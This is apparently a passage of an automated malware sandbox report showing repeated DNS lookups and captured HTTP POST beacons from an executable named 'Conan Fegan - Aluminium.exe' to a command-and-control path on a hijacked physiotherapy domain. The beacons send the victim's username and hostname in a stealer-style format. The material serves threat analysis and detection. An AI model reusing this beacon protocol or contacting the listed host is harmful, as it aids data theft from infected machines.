                                          Feb 22, 2021 19:13:52.534214973 CET192.168.2.48.8.8.80xaab4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:53.826677084 CET192.168.2.48.8.8.80x94a5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:55.097614050 CET192.168.2.48.8.8.80xfe8eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:56.374689102 CET192.168.2.48.8.8.80xf40bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:57.636794090 CET192.168.2.48.8.8.80xb50bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:58.918042898 CET192.168.2.48.8.8.80x189eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:00.227699995 CET192.168.2.48.8.8.80xd116Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:01.510381937 CET192.168.2.48.8.8.80x15ccStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:02.839185953 CET192.168.2.48.8.8.80xa955Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:04.114171028 CET192.168.2.48.8.8.80xadedStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:05.420623064 CET192.168.2.48.8.8.80x92dbStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:06.720895052 CET192.168.2.48.8.8.80xa19aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:08.022066116 CET192.168.2.48.8.8.80x9f0dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:09.293391943 CET192.168.2.48.8.8.80xeef4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:10.585911036 CET192.168.2.48.8.8.80xc87fStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:11.897115946 CET192.168.2.48.8.8.80xa87eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:13.196566105 CET192.168.2.48.8.8.80x7172Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:15.029618979 CET192.168.2.48.8.8.80xd6e2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:16.292236090 CET192.168.2.48.8.8.80x709aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:17.598541975 CET192.168.2.48.8.8.80x8a0Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:18.904568911 CET192.168.2.48.8.8.80x7e31Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:20.202388048 CET192.168.2.48.8.8.80x9814Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:21.463465929 CET192.168.2.48.8.8.80x9e5bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:22.777031898 CET192.168.2.48.8.8.80xc629Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:24.085288048 CET192.168.2.48.8.8.80x18abStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:25.337888002 CET192.168.2.48.8.8.80x973dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:26.620599985 CET192.168.2.48.8.8.80xe366Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:27.894123077 CET192.168.2.48.8.8.80xdaf0Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:29.153413057 CET192.168.2.48.8.8.80x969fStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:30.406487942 CET192.168.2.48.8.8.80x78c7Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:31.727921963 CET192.168.2.48.8.8.80xea94Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:33.020991087 CET192.168.2.48.8.8.80xe4e5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:34.320353031 CET192.168.2.48.8.8.80xe926Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:35.638341904 CET192.168.2.48.8.8.80x677aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:36.937913895 CET192.168.2.48.8.8.80xd1e2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:38.226160049 CET192.168.2.48.8.8.80x266aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:39.548564911 CET192.168.2.48.8.8.80x4299Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:40.861488104 CET192.168.2.48.8.8.80x8033Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:42.153589010 CET192.168.2.48.8.8.80xa184Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:43.443846941 CET192.168.2.48.8.8.80xa0afStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:44.731411934 CET192.168.2.48.8.8.80x532bStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:46.037934065 CET192.168.2.48.8.8.80x6761Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:47.326683998 CET192.168.2.48.8.8.80xea29Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:48.652367115 CET192.168.2.48.8.8.80x6a3aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:49.946625948 CET192.168.2.48.8.8.80x3ab8Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:51.218924046 CET192.168.2.48.8.8.80x65f4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:52.516993046 CET192.168.2.48.8.8.80xb1f8Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:53.796204090 CET192.168.2.48.8.8.80xcbd8Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:55.085910082 CET192.168.2.48.8.8.80x1512Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:56.344922066 CET192.168.2.48.8.8.80xf929Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Feb 22, 2021 19:13:01.708600998 CET8.8.8.8192.168.2.40xf2b4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:03.113802910 CET8.8.8.8192.168.2.40xc3d2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:04.329303026 CET8.8.8.8192.168.2.40xf658No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:05.698806047 CET8.8.8.8192.168.2.40xf93eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:07.065711021 CET8.8.8.8192.168.2.40xa7f6No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:09.033745050 CET8.8.8.8192.168.2.40x3a63No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:10.409897089 CET8.8.8.8192.168.2.40xddf9No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:11.784482002 CET8.8.8.8192.168.2.40x96c5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:13.098505974 CET8.8.8.8192.168.2.40x7723No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:14.410690069 CET8.8.8.8192.168.2.40xfb83No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:15.753534079 CET8.8.8.8192.168.2.40x4299No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:17.062061071 CET8.8.8.8192.168.2.40xdb49No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:18.400012016 CET8.8.8.8192.168.2.40x177cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:19.701555014 CET8.8.8.8192.168.2.40xbe65No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:20.985097885 CET8.8.8.8192.168.2.40x7c9dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:22.325532913 CET8.8.8.8192.168.2.40x8e2aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:23.659809113 CET8.8.8.8192.168.2.40x4b1cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:25.014542103 CET8.8.8.8192.168.2.40x9f7No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:26.614264011 CET8.8.8.8192.168.2.40x8dcaNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:27.933027983 CET8.8.8.8192.168.2.40xe56cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:29.239970922 CET8.8.8.8192.168.2.40xd2aeNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:30.543951035 CET8.8.8.8192.168.2.40x5c1dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:31.841751099 CET8.8.8.8192.168.2.40x73e3No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:33.143090010 CET8.8.8.8192.168.2.40xa1caNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:34.473993063 CET8.8.8.8192.168.2.40xc977No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:35.749298096 CET8.8.8.8192.168.2.40x43e1No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:37.036025047 CET8.8.8.8192.168.2.40x5256No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:38.343662024 CET8.8.8.8192.168.2.40xba7cNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:39.638431072 CET8.8.8.8192.168.2.40x6371No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:40.957115889 CET8.8.8.8192.168.2.40x8eb6No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:42.242538929 CET8.8.8.8192.168.2.40x3351No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:43.532692909 CET8.8.8.8192.168.2.40x40f2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:44.793344975 CET8.8.8.8192.168.2.40xb103No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:46.095216990 CET8.8.8.8192.168.2.40x15f5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:47.418471098 CET8.8.8.8192.168.2.40xe9f4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:48.698528051 CET8.8.8.8192.168.2.40x8755No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:49.976164103 CET8.8.8.8192.168.2.40xa2eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:51.275183916 CET8.8.8.8192.168.2.40xb66aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:52.587490082 CET8.8.8.8192.168.2.40xaab4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:53.875464916 CET8.8.8.8192.168.2.40x94a5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:55.155000925 CET8.8.8.8192.168.2.40xfe8eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:56.423229933 CET8.8.8.8192.168.2.40xf40bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:57.693878889 CET8.8.8.8192.168.2.40xb50bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:58.975639105 CET8.8.8.8192.168.2.40x189eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:00.289978027 CET8.8.8.8192.168.2.40xd116No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:01.575758934 CET8.8.8.8192.168.2.40x15ccNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:02.888058901 CET8.8.8.8192.168.2.40xa955No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:04.163002968 CET8.8.8.8192.168.2.40xadedNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:05.469511986 CET8.8.8.8192.168.2.40x92dbNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:06.769843102 CET8.8.8.8192.168.2.40xa19aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:08.070943117 CET8.8.8.8192.168.2.40x9f0dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:09.352627993 CET8.8.8.8192.168.2.40xeef4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:10.638309002 CET8.8.8.8192.168.2.40xc87fNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:11.957366943 CET8.8.8.8192.168.2.40xa87eNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:13.248152971 CET8.8.8.8192.168.2.40x7172No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:15.078545094 CET8.8.8.8192.168.2.40xd6e2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:16.344048023 CET8.8.8.8192.168.2.40x709aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:17.658497095 CET8.8.8.8192.168.2.40x8a0No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:18.961647034 CET8.8.8.8192.168.2.40x7e31No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:20.252974033 CET8.8.8.8192.168.2.40x9814No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:21.528162003 CET8.8.8.8192.168.2.40x9e5bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:22.828773975 CET8.8.8.8192.168.2.40xc629No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:24.138386965 CET8.8.8.8192.168.2.40x18abNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:25.386800051 CET8.8.8.8192.168.2.40x973dNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:26.670846939 CET8.8.8.8192.168.2.40xe366No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:27.951292992 CET8.8.8.8192.168.2.40xdaf0No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:29.203366041 CET8.8.8.8192.168.2.40x969fNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:30.455286026 CET8.8.8.8192.168.2.40x78c7No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:31.792812109 CET8.8.8.8192.168.2.40xea94No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:33.069703102 CET8.8.8.8192.168.2.40xe4e5No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:34.368915081 CET8.8.8.8192.168.2.40xe926No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:35.686975956 CET8.8.8.8192.168.2.40x677aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:36.989465952 CET8.8.8.8192.168.2.40xd1e2No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:38.275090933 CET8.8.8.8192.168.2.40x266aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:39.597359896 CET8.8.8.8192.168.2.40x4299No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:40.910367966 CET8.8.8.8192.168.2.40x8033No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:42.204519987 CET8.8.8.8192.168.2.40xa184No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:43.493170977 CET8.8.8.8192.168.2.40xa0afNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:44.783324003 CET8.8.8.8192.168.2.40x532bNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:46.086884975 CET8.8.8.8192.168.2.40x6761No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:47.375808954 CET8.8.8.8192.168.2.40xea29No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:48.703289032 CET8.8.8.8192.168.2.40x6a3aNo error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:49.995392084 CET8.8.8.8192.168.2.40x3ab8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:51.267704964 CET8.8.8.8192.168.2.40x65f4No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:52.566010952 CET8.8.8.8192.168.2.40xb1f8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:53.844918966 CET8.8.8.8192.168.2.40xcbd8No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:55.140264988 CET8.8.8.8192.168.2.40x1512No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)
                                          Feb 22, 2021 19:14:56.395956993 CET8.8.8.8192.168.2.40xf929No error (0)www.ritcophysiotherapy.com.au203.170.84.89A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.ritcophysiotherapy.com.au

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.449745203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:02.072160959 CET1419OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 190
                                          Connection: close
                                          Feb 22, 2021 19:13:02.422183037 CET1425OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: 'ckav.rujones910646DESKTOP-716T771k08F9C4E9C79A3B52B3F739430vCbcb
                                          Feb 22, 2021 19:13:02.801673889 CET1431INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.449747203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:03.456110954 CET1433OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 190
                                          Connection: close
                                          Feb 22, 2021 19:13:03.791301966 CET1434OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: 'ckav.rujones910646DESKTOP-716T771+08F9C4E9C79A3B52B3F739430mPPQc
                                          Feb 22, 2021 19:13:04.158847094 CET1446INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          10192.168.2.449757203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:16.098573923 CET1548OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:16.432831049 CET1548OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:16.800559998 CET1548INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          11192.168.2.449758203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:17.407438040 CET1549OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:17.742592096 CET1549OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:18.107852936 CET1550INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          12192.168.2.449759203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:18.738996983 CET1551OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
